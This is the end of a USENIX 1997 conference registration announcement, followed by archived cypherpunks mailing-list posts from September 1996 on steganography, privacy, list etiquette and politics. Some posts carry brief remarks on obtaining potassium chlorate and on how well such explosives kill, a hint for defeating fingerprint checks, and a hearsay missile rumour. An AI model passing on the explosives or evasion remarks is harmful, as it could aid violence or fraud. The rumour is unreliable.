reservation. You must mention USENIX to get the special rate. A
one-night room deposit must be guaranteed to a major credit card. To
cancel your reservation, you must notify the hotel at least 24 hours
before your planned arrival date.

Anaheim Marriott
700 West Convention Way
Anaheim, CA 92802
Toll Free: 800.228.9290
Phone: 714.750.8000
Reservation Fax: 714.750.9100

Room Rates:	$107/Single, $117/Double
(plus local taxes, currently at 15%)

Need a Roommate?

Usenet facilitates room sharing. If you wish to share a room, post
to and check comp.org.usenix.roomshare.

Discount Airfares and Car Rentals

Special discounted air fares and car rentals are available only
through JNR, Inc., a full service travel agency. All restrictions
apply. Please call JNR for details. Call toll free 800.343.4546 in
the USA and Canada or telephone 714.476.2788.


STUDENT STIPENDS AND DISCOUNTS
==============================
TUTORIALS: A limited number of seats in each tutorial are reserved
for full-time students at the very special rate of $70.00 per
tutorial. To take advantage of this, you must telephone the
conference office to confirm availability and make a reservation.
You will receive a reservation code number which must appear on your
registration form. Your registration form with full payment and a
photocopy of your current student ID card must arrive within 14 days
from the date of your reservation. If they do not arrive by that
date, your reservation will be canceled. This special fee is
non-transferable.

TECHNICAL SESSIONS: USENIX offers a discount rate of $75 for
technical sessions for full-time students. You must include a copy
of your current student I.D. card with your registration. This fee
is not transferable.

STIPENDS: Student stipends are available to pay for travel, living
expenses and registration fees to enable full-time students to
attend this conference. To apply for a stipend, read comp.org.usenix
six to eight weeks before the conference, visit our Web site,
http://www.usenix.org, or contact Diane DeMartini (diane@usenix.org)
for more information.

********************************************************************

To obtain descriptions concerning the tutorials and technical
sessions, and full conference information, please contact USENIX 
via any one of the following methods:

* Visit our Website, URL:  http://www.usenix.org

* Send email to our mailserver at: info@usenix.org
  Your message should contain the line:  send usenix97 conferences

* Contact:	USENIX Conference Office, 
		22672 Lambert St., Suite 613, 
		Lake Forest, CA USA 92630
		Phone: 714-588-8649
		Fax: 714-588-9706
		Email: conference@usenix.org


********************************************************************
USENIX ASSOCIATION 

The USENIX Association brings together the community of engineers,
system administrators,  scientists, and technicians working on the
cutting edge of computing. Its technical conferences are the essential
meeting grounds for the presentation and discussion of the most
advanced information on new developments in all aspects of advanced
computing systems.

==========================CUT HERE================================

REGISTRATION FORM - USENIX 1997 TECHNICAL CONFERENCE
                    January  6-10, 1997, Anaheim, California
=================================================================
								WWW	

Please complete the form below and return with full payment to:

USENIX CONFERENCE OFFICE
22672 Lambert St., Suite 613, Lake Forest, CA 92630
Telephone: (714) 588-8649 / FAX Number (714) 588-9706
Electronic Mail Address:  conference@usenix.org
Office Hours: 8:30am - 5:00pm Pacific Time

NAME________________________________________________________________
         (first)                                 (last)

FIRST NAME FOR BADGE____________________________

USENIX Member ID____________________

COMPANY OR INSTITUTION______________________________________________

MAILING ADDRESS_____________________________________________________
						(mail stop)

____________________________________________________________________

CITY___________________________STATE_____COUNTRY________ZIP____________

TELEPHONE NO:_________________________FAX NO._________________________

NETWORK ADDRESS______________________________________________________
                          (one only please)

The address you provide will be used for all future USENIX
mailings unless you notify us in writing.

ATTENDEE PROFILE
Please help us serve you better.  By answering the following
questions, you help us plan our activities to meet members'
needs.  All information is confidential.

[ ] I do not want to be on the attendee list
[ ] I do not want my address made available for other than USENIX
    mailings
[ ] I do not want USENIX to email me notices of Association activities.

What is your affiliation? [ ]academic  [ ]commercial  [ ]gov't  [ ]R&D

What is your role in purchase decision?
1.[] final  2.[] specify  3.[] recommend 4.[] influence 5.[] no role

What is your job function? (check one)
1.[] system/network administrator    2.[] consultant 
3.[] academic/research   4.[] developer/programmer/architect 
5.[] system engineer    6.[] technical manager  7.[] student
8.[] security  9.[] webmaster

How did you hear about this meeting:
1.[] USENIX brochure 2.[] newsgroup/bulletin board 3.[] ;login:  
4.[] World Wide Web  6.[] from a colleague  7.[] magazine

What publications or newgroups do you read releated to advanced 
computing systems?_____________________________________________

=================================================================

TUTORIAL PROGRAM 
Select only one full-day tutorial per day - 9:00am-5:00pm

Monday, January 6, 1997
========================
[ ] M1:  Beginning Perl Programming 
[ ] M2:  Kerberos Approach to Network Security
[ ] M3:  Introduction to Java
[ ] M4:  Secure Java Programming
[ ] M5:  Windows NT and Windows 95
[ ] M6:  UNIX Network Programming
[ ] M7:  Topics in System Administration
[ ] M8:  How Networks Work
[ ] M9:  System and Network Performance Tuning
[ ] M10: Inside the Linux 2.0 Kernel

    Second Choice of first is filled:____________________________

Tuesday, January 7, 1997
=========================
[ ] T1:  UNIX Security Tools
[ ] T2:  CGI and WWW Programming in Perl
[ ] T3:  Security on the Web
[ ] T4:  Creating Effective User Interfaces
[ ] T5:  Java Applets and the AWT
[ ] T6:  Setting Up and Administering a Web Server
[ ] T7:  Security for Software Developers
[ ] T8:  Solaris System Administration
[ ] T9:  IP version 6
[ ] T10: Writing Device Drivers Under Linux

    Second Choice of first is filled:____________________________


TUTORIAL PROGRAM FEES (January 6-7)
	Two full-day tutorials.................$620	$_________
	CEU credit (optional)..................$ 30	$_________
	One full-day tutorial..................$335	$_________
	CEU credit (optional)..................$ 15	$_________

	Late fee applies if postmarked after 
	  Friday, November 22, 1996........Add $ 50	$_________

	Full-Time Students (see "STUDENT STIPENDS AND
	DISCOUNTS"  above on how to obtain code)
	CODE NO:______________________         $ 70	$_________
	CODE NO:______________________         $ 70	$_________

TECHNICAL SESSION FEES

	Current Member Fee.....................$340	$________
        (Applies to current USENIX, EurOpen national
	 groups, JUS and AUUG, and Linux Int'l members)

	Non-Member or Renewing Member Fee**....$410	$________
	**Join or renew your USENIX/SAGE membership 
	and attend the conference for same low price 
                                         -Check here [ ]

	Join or renew your SAGE membership...Add $ 25	$_________
	(You must be a member of USENIX)

	Late fee applies if postmarked after 
	  Friday, November 22, 1996..........Add $ 50	$_________

	Full-Time Student Fee*: pre-registered  
	                       or on-site......$ 75	$_________
	Full-Time Student Fee* including USENIX 
	                   membership fee......$100	$_________

	*Students must include photocopy of current 
   	student I.D.

                       TOTAL ENCLOSED...................$_________


PAYMENT MUST ACCOMPANY THIS FORM.  
Payment in US Dollars must accompany this form.  Purchase orders,
vouchers, telephone or email registrations cannot be accepted.  

[ ] Payment Enclosed (Make check payable to USENIX Conference)

CHARGE TO MY:  ___VISA ___MASTERCARD ___AMERICAN EXPRESS ___DINERS CLUB

ACCOUNT NO.______________________________________ EXP. DATE___________

_______________________________________/___________________________
 Print Cardholder's Name                 Cardholder's Signature

You may fax your registration form if paying by credit card to 
USENIX Conference Office, fax:  714-588-9706.  (To avoid duplicate 
billing, please DO NOT mail an additional copy.)

REFUND CANCELLATION POLICY:  If you must cancel, all refund requests 
must be in writing and postmarked no later than December 27, 1996.  
Telephone cancellations cannot be accepted.  You may telephone to 
substitute another in your place.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Batman <batman@infomaniak.ch>
Date: Thu, 19 Sep 1996 18:00:35 +0800
To: "gnu@toad.com>
Subject: RE: Bernstein hearing reminder: THIS Friday 11:45AM, SF Federal Building
Message-ID: <01BBA60C.5AD5CCC0@misd145.cern.ch>
MIME-Version: 1.0
Content-Type: text/plain


For the 200th time, unsubscrive me of your fucked mail lists.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Fri, 20 Sep 1996 15:00:00 +0800
To: Rick Osborne <cypherpunks@toad.com
Subject: Re: PGP in the workplace
Message-ID: <199609200503.WAA25335@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 11:20 PM 9/17/96 -0400, Rick Osborne wrote:
> Upon explaining to them that I was simply trying to make sure of my own
> security, I was told that I was to just assume that I was secure, and that
> *any* 'poking around' was found to be "highly aggravating" and could only
> only "exascerbate the situation further.".
>
> Now, seeing as I'm fairly new to the Corporate world, but is this something
> common?  

Not at all common in my experience, though whether this is because most
bosses are more enlightened, or because most bosses are pig ignorant
about security, I am not sure.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mullen Patrick" <Mullen.Patrick@mail.ndhm.gtegsc.com>
Date: Fri, 20 Sep 1996 02:32:59 +0800
To: "Cypherpunks" <cypherpunks@toad.com>
Subject: re: Stego inside encryption
Message-ID: <n1368993974.6219@mail.ndhm.gtegsc.com>
MIME-Version: 1.0
Content-Type: text/plain


To take this one step further, has anyone tried to ever use this method as
an encryption method?  You could hide data in a stream of random bits, using
position as the encryption method.  Obviously, the data would not be stored
in packets; rather as single bits strewn throughout the stream.  Even ASCII
characters could be hidden in such a system very well, as the possibility of
choosing the correct 8 bits (extended char set) from the data stream when
any combination has equal potential of being the correct sequence would be
extremely difficult.  Error checking/correcting code could even be used.

Using this system, the placement algorithm would be the focus of attack.  If
an algorithm which has a sufficiently random placement was used, extracting
the correct bits would be difficult.  Another way to increase the security
would be to hide the correct message inside a bitstream created by using
the same method on other similar messages.  (Hiding a real message inside
bogus messages.  Hmm...  Which one's real?)

Patrick

_______________________________________________________________________________
From: Mullen Patrick on Thu, Sep 19, 1996 9:19
Subject: Stego inside encryption
To: Cypherpunks

I know a lot of times the idea behind steganography is to hide the fact that a
secret message is in a seemingly normal file/mail/whatever.  This is good
for avoiding unwanted interest in your file.  The benefit of not having people
attempt to crack you code, added to the strength of the cryptosystem is
wonderful.  However, I propose this--

Don't hide that anything's encrypted!  Rather than hide this fact, throw it
in their face!  I propose hiding an encrypted message inside another 
encrypted message.  Set bits in specific places to data in the real message.
The benefit is Oscar not only doesn't know what the crypto is, he attacks
the wrong message.  Hiding statistically random bits from the true message
in statistically random bits from the masking message shouldn't be too 
hard.

Granted, this scheme doesn't get you past measures designed to keep out all
encrypted messages, and it surely wouldn't keep you message from generating
interest, but it would be very hard to decrypt the message, especially when 
some algorithm is used which (seemingly) randomly selects which bits to use 
for the stego.

Just a thought...  My apologies if someone has already proposed this method.

Patrick





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Fri, 20 Sep 1996 02:37:07 +0800
To: steve@tsearch.com (Steve Dyson)
Subject: Re: Systems/Communications Security Positions in the South Bay
In-Reply-To: <v0213052fae649f1dbfdc@[206.79.49.12]>
Message-ID: <199609191522.KAA05519@homeport.org>
MIME-Version: 1.0
Content-Type: text


Add a (work available) tag to your subject, and we'll all be fine with
it.

What good's a revolution if you can't get rich? :)

Adam

Steve Dyson wrote:

| I know someone is going to get PO'd about this, but I didn't know how else
| to get these in front of you in a timely manner. These positions are
| critical and interesting parties can interview next week, please read on:


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Fri, 20 Sep 1996 16:42:27 +0800
To: Bill Stewart <robert@precipice.v-site.net
Subject: Re: HipCrime as MetaSPAM
Message-ID: <199609200603.XAA01570@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 02:10 AM 9/15/96 -0700, Bill Stewart wrote:
>5) "Anarchist Info" - sigh.  Where do people get the idea that publishing
>recipes for drugs and explosives is anarchist info?  He didn't talk 
>about anarchy, or getting along without governments, or getting rid of them.
>Also, he neglects to note that you can simply _buy_ potassium chlorate,
>rather than having to (dangerously) boil down bleach and potassium chloride


In addition:  Potassium chlorate based explosives are not particularly
safe or reliable, but worse than that, much worse, because of their
relatively slow detonation rate, they are very ineffectual for smashing
stuff and killing people,
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: craigw@dg.ce.com.au
Date: Thu, 19 Sep 1996 11:39:41 +0800
To: adamsc@io-online.com
Subject: Re: 56 kbps modems
Message-ID: <199609190039.KAA20049@mac.ce.com.au>
MIME-Version: 1.0
Content-Type: text/plain


>Interesting. . .  Oh well, I bet their competition doesn't mind.

That is the major problem. We have only 2 carriers in this country. 
The market is not being deregulated untill mid 97. Optus the other 
carrier has only just installed local access (rather than STD, ISDN 
only) and it covers ~ 11% of the population with this service. The 
other problem is that they use lines leased from telstra as many 
councils and communities are complaining about the laying of new 
cables (arrr joe public). In a recent case where optus decided to try 
and lay the cables against council wishes the council impounded 
several of the vehicles used.
Is it not great to live in the "lucky country". Here in Au we seem to 
delight in first complaining of the poor line quality, and than stop 
new line being installed
Craig

        ,'~``.              \|/              ,'``~.
        (-o=o-)            (@ @)            ,(-o=o-),
+--.oooO--(_)--Ooo-----oOO-(_)-OOo-------oooO--(_)--Oooo.------+
|                                                              |
|   Soon, we may all be staring at our computers, wondering    |
|               whether they're staring back.                  |
|                                                              |
| [Network Admin For WPA Business Products.  aka doshai >;-) ] |
|    .oooO        http://pip.com.au/~doshai/      Oooo.        |
|    (   )   Oooo.                        .oooO   (   )        |
+-----\ (----(   )-------oooO-Oooo--------(   )--- ) /---------+
       \_)    ) /                          \ (    (_/
             (_/                            \_)
Key fingerprint = 2D F4 54 BB B4 EA F1 E7  B6 DE 48 92 FC 8D FF 49
Send a message with the subject "send pgp-key" for a copy of my key.
(if I want to give it to you)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: james_oshea@smb.com (James P. O'Shea III)
Date: Fri, 20 Sep 1996 02:55:01 +0800
To: Batman <gnu@toad.com>
Subject: Re: Bernstein hearing reminder: THIS Friday 11:45AM, SF Federal Building
In-Reply-To: <01BBA60C.5AD5CCC0@misd145.cern.ch>
Message-ID: <9609191046.ZM9184@ws232034>
MIME-Version: 1.0
Content-Type: text/plain


On Sep 19,  9:24am, Batman wrote:
> Subject: RE: Bernstein hearing reminder: THIS Friday 11:45AM, SF
Federal B
>For the 200th time, unsubscrive me of your fucked mail lists.
>
>-- End of excerpt from Batman



Apologies if you receive more than one copy of this message, but I'm
auto-replying to your message to handle the flood:

Redistribution to the list from which you originally received the
problem
message is kindly requested.


    Thank you for bringing this matter to our attention. The email or
    posting you have seen falsely represents Smith Barney and its
    employees. These are erroneous postings that did not originate from
    anyone employed by our firm, and therefore we cannot directly stop
    them from occurring. However we have advised the companies we
believe
    to have serviced the originator of these messages and we are
pursuing
    all possible steps to end this fraud. Unfortunately some people
abuse
    the Internet and we regret any inconvenience they may have caused
you.

    There are currently no mailing lists maintained in the smb.com
domain,
    so you were not subscribed to any list. If you receive any further
    messages of this nature, they are the product of the same spurious
    source.

    We're sorry for any inconvenience you may have experienced as a
result
    of this unfortunate abuse of the 'Net.

    Further queries via email to postmaster@smb.com please.

    Thanks.
    -James
    postmaster, network security, etc.

    -----------------------
    James P. O'Shea III
    Smith Barney Inc.
    postmaster@smb.com


-- 

---------------------------->>>>Note NEW PAGER numbers 6/27/96
James P. O'Shea III		212-723-5885 (voice)
Systems Administrator		212-723-5021 (fax)
Smith Barney Inc.
390 Greenwich/6 West		800-225-0256 PIN 306296 (alpha page)
jposhea3@panix.com         	917-820-5855 (digital page)
james_oshea@smb.com 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Fri, 20 Sep 1996 04:53:04 +0800
To: Dale Thorn <dthorn@gte.net>
Subject: Re: A Bizarre Increase in the Ad Hominems Here
In-Reply-To: <3240C258.3464@gte.net>
Message-ID: <Pine.BSF.3.91.960919110821.22661F-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Pardon me for butting in, but "nutcase and liar" are some pretty 
> significant slurs, moreso than "putz" or "bozo" or whatever. I'd say 
> there's gotta be a helluva story here. Background, anyone?
> 

Don't go there, Dave. ;)

Just stay home and watch some soaps, and spare us the agony ...

Consider this a plea, rather than an attempt at censorship  :)

- r.w.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: steve@tsearch.com (Steve Dyson)
Date: Fri, 20 Sep 1996 09:17:13 +0800
To: cypherpunks@toad.com
Subject: unscribe cypherpunks@toad.com
Message-ID: <v02130500ae66de867352@[206.79.49.12]>
MIME-Version: 1.0
Content-Type: text/plain


unscribe cypherpunks@toad.com

]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]
Steve Dyson                             Technology Search International
Consultant                                 25 Metro Drive, STE 238
steve@tsearch.com              San Jose, CA 95110
VOICE 408.437.9500            FAX 408.437.1033

"...dockin-doid, dockin-doid.........dockin- doid"
]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: DMiskell@envirolink.org (Daniel Christopher Miskell)
Date: Fri, 20 Sep 1996 04:37:04 +0800
To: Dale Thorn <dthorn@gte.net>
Subject: Re: A daily warning regarding Timothy C. May
Message-ID: <v01540b00ae66ebfc97d8@[150.160.45.149]>
MIME-Version: 1.0
Content-Type: text/plain


>Daniel Christopher Miskell wrote:
>> Timothy C. May is a lying sack of shit.
>> Right.  And you had to insult him through use of anonymous mail.  Boy,
>> you're real brave, shedding the light to the rest of the cypherworld
>> in such a manner.
>> Apologies for the spam, but there was no address, obviously.
>> If in fact we are the only intelligent life on this planet, why the
>> fuck are we in this goddamn mess?
>
>A. There's probably no intelligent life in the (this) universe, and the
>   Uncertainty Principle is probably wrong, too (i.e., there is really
>   no Free Will, so there are no valid answers either), -and-
>
>B. If you were truly intelligent, would you want to come here?

I find the lack of seperators between what anon wrote, what I wrote, and what
my sig said amusing.

Well, I get the feeling that I am intelligent.  I tested for acceptance into
Mensa, and after finding out my IQ was 156, I felt I had better things to do
than include myself with the 'intelligence elite'.  This list is a cool spot.
I find out a lot of things I didn't know about, and hear a lot of things that
the media isn't going to cover, things called 'rumor' because they don't want
them to be true.

Who knows, maybe we are all dumb.  Either way, it does no good to lament wether
or not we have sufficient intelligence to be referred to as 'itelligent life.'
Personally, I find that it is far more fun to keep on trucking with life, rather
than debate a moot point that we have no control over.

--
If in fact we are the only intelligent life on this planet, why the fuck are
we in this goddamn mess?
--
Find my public key on the World Wide Web -- point your browser at:
http://bs.mit.edu:8001/pks-toplev.html






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: DMiskell@envirolink.org (Daniel Christopher Miskell)
Date: Fri, 20 Sep 1996 03:31:50 +0800
To: Rabid Wombat <wombat@mcfeely.bsfs.org>
Subject: Re: All Bets Off
Message-ID: <v01540b01ae66edeb0b62@[150.160.45.138]>
MIME-Version: 1.0
Content-Type: text/plain


>On Tue, 17 Sep 1996, Jeff Davis wrote:
>
>> > Just so this isn't hanging in cyberspace forever, my $5,000 bet for
>> > anyone to prove the TWA 800 flight was downed by a U.S. missile is now
>> > *off the table*.
>>
>> I heard through  the family grapevine that they have pictures of a Stinger
>> taking out the plane they're analyzing in the Pentagon.  There are 220+
>> Stingers *missing* in the US, so its not like they have to smuggle them
>> in...  (That's not proof by any means, but *my* family grapevine has always
>> been very reliable.  The cousin who told me this has a Dad who flew as
>> the intelligence officer observer on Bronco flights out of Quang Tri for
>> 18 months, rotating out just before the base was over run in May of '72.)
>
>Does this cousin also have an aunt who lived next door to Joe Montana's
>babysitter? I might know his father ...
>
>Ask your family grapevine about the stinger's op altitude, and the
>altitute of the TWA when it broke up - I don't have Jane's lying around,
>but it seems that the TWA plane was a tad bit high for a stinger.
>
>- r.w.

I recall that Tom Clancy, who has written a number of military fiction novels,
for which he has done endless notebooks full of research for, made a statement
about this.  He said, simply, that the TWA jet's explosion was at such an
altitude, that even if someone did it from a boat directly under, it was still
far too high for a Stinger missile to reach, much less dammage.  Just thought
I would throw that out there.

Tom Clancy is not a military-hired brain, but to make his novels realistic and
to do justice to the people he portrays, he does a LOT of research.  He is a
highly respected author, and I have no doubt that his statement is based on
his personal findings, collected for a previous novel.

--
If in fact we are the only intelligent life on this planet, why the fuck are
we in this goddamn mess?
--
Find my public key on the World Wide Web -- point your browser at:
http://bs.mit.edu:8001/pks-toplev.html






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Remo Pini <rp@rpini.com>
Date: Thu, 19 Sep 1996 20:10:58 +0800
To: cypherpunks@toad.com
Subject: Re: Cryptologie: Conference internationale - 25 SEPT - Paris
Message-ID: <9609190933.AA24701@srzts100.alcatel.ch>
MIME-Version: 1.0
Content-Type: text/plain

-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

To: cypherpunks@toad.com
Date: Thu Sep 19 11:31:08 1996
> September 25, 1996
> 
> Centre de Conf=E9rence Internationale
> 19 Avenue Kleber, Paris 16, France
> 
> Program, registration and further information (English):
> http://www.epic.org/events/crypto_paris
> 
I'll be there, how about any of you out there (yes, I know some of you wi=
ll 
be there as a feature)?


- ------< fate favors the prepared mind >------
Remo Pini                        rp@rpini.com
PGP:  http://www.rpini.com/crypto/crypto.html
- ----< words are what reality is made of >----
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQEVAwUBMkES3RFhy5sz+bTpAQEzmAf/d1XqnIlGj3jgX/hgGLwom15WLsNvPjfZ
YcQqOjP3e5pEeHjWWAUUjQ2dopTOI7+Kytb4ZCIgoI6TIFmkWj/jAMfpx/IYx89C
Db3f7+jvEN19Q/NQUYdUXktqaMC7zFMjgX8U2LBfiuR7qloMMJV+O3pDTvdJCjln
BumjKnk9NwebtBrcmMIw3Y1LZ1jjFfwbanUEYlKMUgp32XXxxe+q0HOWI4x9gb32
NvPlXSftPSkpHt2M8V52wZljbtnd9WfDTsqscEjaZ3e++IousAc2itkFSV3jvS72
XT2ZZrU3lJc0n8qOjKyYR19hMIfzQgzwmrbukK0/W8R923SSA01nGA==
=ERW9
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Thu, 19 Sep 1996 20:11:00 +0800
To: Mixmaster <lucifer@dhp.com>
Subject: an author rating was: Re: Cypherpunk Enquirer [NOISE]
In-Reply-To: <199609190441.AAA12078@dhp.com>
Message-ID: <199609190939.LAA00616@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Authors:

Bryce 9
Enquirer 9
Black Unicorn 7
Duncan Frissell 7
Robert A. Hettinga 7
Lucky Green 7
Sandy Sandfort 7
Hal 7
Perry E. Metzger 7
Tim May 7
John Young 5
llurch 5
Rick Smith 5
Jim Bell 0
Vulis 0



Subjects:

DigiCash 9
Ecash 9
Chaum 8
nym 7
Java 5 
trust 5
government 0
policy 0
escrow 0
GAK 0
terror 0
freeh 0
clinton 0
whitehouse 0
white house 0
FBI 0
NSA 0
export 0
munition 0


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMkEUzUjbHy8sKZitAQGw1gMA05giwvl28mmxBpBFmIwDf1DvPAzjPHC6
jh3oZ8zAFYE1WByDKl1/N9InCDTosr6SEfWsuwvLbt04r5WMd6Ay3grXRaABN2dk
ocrccaOyBDdWFk7XdR8HqqaJkMeF5LkV
=78PT
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Fri, 20 Sep 1996 06:02:04 +0800
To: Jeff Barber <jeffb@issl.atl.hp.com>
Subject: Re: DL in exchange for fingerprint
Message-ID: <199609191845.OAA02427@attrh1.attrh.att.com>
MIME-Version: 1.0
Content-Type: text/plain


>    "We keep a memory bank that matches your fingerprints with your
>    license," [DoPS spokesman] said.  "In other words, if you went to
>    get a new license with a false birth certificate and your
>    fingerprint didn't match the name, you wouldn't get a license.

Totally bogus - _my_ birth certificate didn't have my fingerprints on it :-)
Now, it may help stop people from getting duplicate licenses,
assuming they use the same finger each time and don't have the
sense to put rubber cement or ridge filler or something on their
fingers first (and assuming, of course, that the system actually
_checks_ the fingerprint in real time, rather than just recording it.)

>Just what I would have called it: a great idea.  Is it true that 31
>other states take your fingerprint as part of the license application?
>I feel sick.

Wouldn't be surprising; you didn't think you lived in America, did you?

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Fri, 20 Sep 1996 05:16:28 +0800
To: Eric Murray <ericm@lne.com>
Subject: Re: cypherpunk listserve usefulness
In-Reply-To: <199609181601.JAA28161@slack.lne.com>
Message-ID: <Pine.SUN.3.91.960919115916.21961C-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 18 Sep 1996, Eric Murray wrote:

> No, filtering your mail does NOT make you a censor, unless you're
> filtering the mail before it is gatewayed to a list or newsgroup
> where other people read it.  And they didn't ask you to do the filtering.

Yep, matter of fact that's what the light versions of cpunx are for.  's 
matter of fact I happen to run one of them and my subscribers are happier 
without all the noise and flames here.  :)  as for me, I don't mind the 
noise or the flames, I tend to hit the "D" key quite often. :)
 
( to subscribe to it, send a message to my address with the >SUBJECT< 
"fcpunx subscribe" or "fcpunx help" for help.)

> Filtering your own mail is akin to choosing which articles
> in a magazine to read.  It's not censorship if you don't
> read an article; it's the article's author's fault that
> he didn't make the article interesting enough for you to read.

Yep.

> I think that anyone who has to work for a living must filter
> the cypherpunks list in order to cut out some of the crap.
> Most people just don't have the time to wade through everything, and
> filtering some of it out is a good start on upping the S/N ratio.
> What you consider Signal and Noise however is entirely up to you.

Especially since Cypherpunks isn't the only list I subscribe to.  I go 
through about 200-300 messages a day, and 80% of them get delted without 
a single look.  I tend to read the 1st few messages of a topic, and if 
it's noise, it gets axed. :)

=============================================================================
 + ^ + |  Ray Arachelian    |FL|       KAOS KERAUNOS KYBERNETOS      |==/|\==
  \|/  |sunder@brainlink.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
<--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/=
  /|\  | Just Say "No" to   |KA|law abridging the freedom of speech' |==\|/==
 + v + | Janet Reno & GAK   |AK|        do you not understand?       |=======
===================http://www.brainlink.org/~sunder/=========================
           ActiveX! ActiveX! Format Hard drive? Just say yes!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Minow <minow@apple.com>
Date: Fri, 20 Sep 1996 06:38:21 +0800
To: Asgaard <asgaard@Cor.sos.sll.se>
Subject: Re: GAK, GAP, GAY
In-Reply-To: <199609190117.SAA04924@netcom21.netcom.com>
Message-ID: <v03007807ae674bc9377e@[17.202.12.102]>
MIME-Version: 1.0
Content-Type: text/plain


> (The Swedish Post is currently
>spending a lot of money advertising their new Web services. For
>full access to such sensitive data as detailed wheather maps you
>have to enter your name, address and Person Number - for credit
>information, they say - and they will send you, by snail mail, a
>username and password; http://www.torget.se)

Actually, they say they'll send it by Registered Mail - so there
is an "authenticated" binding between userID and person. (MIT did
this for accounts on MIT-AI about 20 years ago.) They will also
send a copy of your Swedish credit report. Since the Swedish
Post is planning to get into offering services for a fee, their
requirement for a means of payment seems reasonable, though I
would have thought that a Visa number would be sufficient.

They refused my application without sending a copy of my credit
report (and without explanation), even though I provided them
with my valid Swedish personal number. I may complain in person
next week when I'm in Stockholm for vacation, though it seems
like a dumb way to spend a vacation.

Martin.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: craigw@dg.ce.com.au
Date: Thu, 19 Sep 1996 12:50:11 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Spam blacklist project
Message-ID: <199609190217.MAA23297@mac.ce.com.au>
MIME-Version: 1.0
Content-Type: text/plain


What...only half
;)

> Half the population doesn't care who their masters are, as long as they 
> have masters that tell them what to do.
> 
> --Lucky
> 

        ,'~``.              \|/              ,'``~.
        (-o=o-)            (@ @)            ,(-o=o-),
+--.oooO--(_)--Ooo-----oOO-(_)-OOo-------oooO--(_)--Oooo.------+
|                                                              |
|   Soon, we may all be staring at our computers, wondering    |
|               whether they're staring back.                  |
|                                                              |
| [Network Admin For WPA Business Products.  aka doshai >;-) ] |
|    .oooO        http://pip.com.au/~doshai/      Oooo.        |
|    (   )   Oooo.                        .oooO   (   )        |
+-----\ (----(   )-------oooO-Oooo--------(   )--- ) /---------+
       \_)    ) /                          \ (    (_/
             (_/                            \_)
Key fingerprint = 2D F4 54 BB B4 EA F1 E7  B6 DE 48 92 FC 8D FF 49
Send a message with the subject "send pgp-key" for a copy of my key.
(if I want to give it to you)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 20 Sep 1996 06:03:18 +0800
To: jbugden@smtplink.alis.ca
Subject: Re: Workers Paradise. /Political rant.
Message-ID: <01I9NVPGAM908Y4ZFH@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"jbugden@smtplink.alis.ca" 17-SEP-1996 01:09:37.71

	Mind trying to do 72-column or so formatting, BTW?

>Canada has a single payer system and we spend about two thirds as much as t=
>he
>U.S. on health care as a percentage of G.N.P. We manage to insure all Canad=
>ians
>while about 35% of people in the U.S. have *no* health insurance.

	Canada also has less smoking, teenage pregnancy, and various other
